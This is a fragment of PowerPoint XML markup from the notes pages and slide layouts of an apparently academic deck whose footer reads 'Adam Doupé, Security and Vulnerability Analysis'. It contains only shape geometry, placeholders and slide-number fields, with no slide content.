            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161218" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4570413" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5028580" cy="4113862"/>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6A9F5F4-E525-D14B-8B7E-21CBE8D00731}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170434" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4570413" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5028580" cy="4113862"/>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CDB4AEF-FD69-0749-9ECB-DF98A26D3647}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941058" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4570413" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5028580" cy="4113862"/>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C931B52-9FA6-7247-A766-F00AFA1FC2AB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="943106" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1144588" y="685800"/>
            <a:ext cx="4570412" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="943107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685646" y="4343714"/>
            <a:ext cx="5486708" cy="4113862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91712" tIns="45856" rIns="91712" bIns="45856">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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23FBD8E-E724-1340-8322-2F48060DABF6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="945154" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4570413" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="945155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5028580" cy="4113862"/>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D36D0B8-2544-2B47-870D-4D2FB1CB9C99}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="947202" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4570413" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="947203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5028580" cy="4113862"/>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175D2D1-C1EE-7C4E-A09D-B505F3334DAE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949250" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4570413" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5028580" cy="4113862"/>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B9D74E5-98B7-C64D-93DB-39549CA035BA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564226"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64227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914401" y="4343401"/>
            <a:ext cx="5029200" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="89659" tIns="44830" rIns="89659" bIns="44830">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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208AF7E-26EF-114E-B19A-421E085F11EC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566274"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66275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914401" y="4343401"/>
            <a:ext cx="5029200" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="89659" tIns="44830" rIns="89659" bIns="44830">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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180802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a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25131871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a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11927670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a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3619500"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fr-FR" smtClean="0"/>
              <a:t>Adam Doupé, Security and Vulnerability Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2173440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a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D7E63A33-8271-4DD0-9C48-789913D7C115}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19265315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a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28143121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12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2005068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a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6089913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524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8615524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4"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a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2754ED01-E2A0-4C1E-8E21-014B99041579}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40942909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9"/>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a:xfrm>
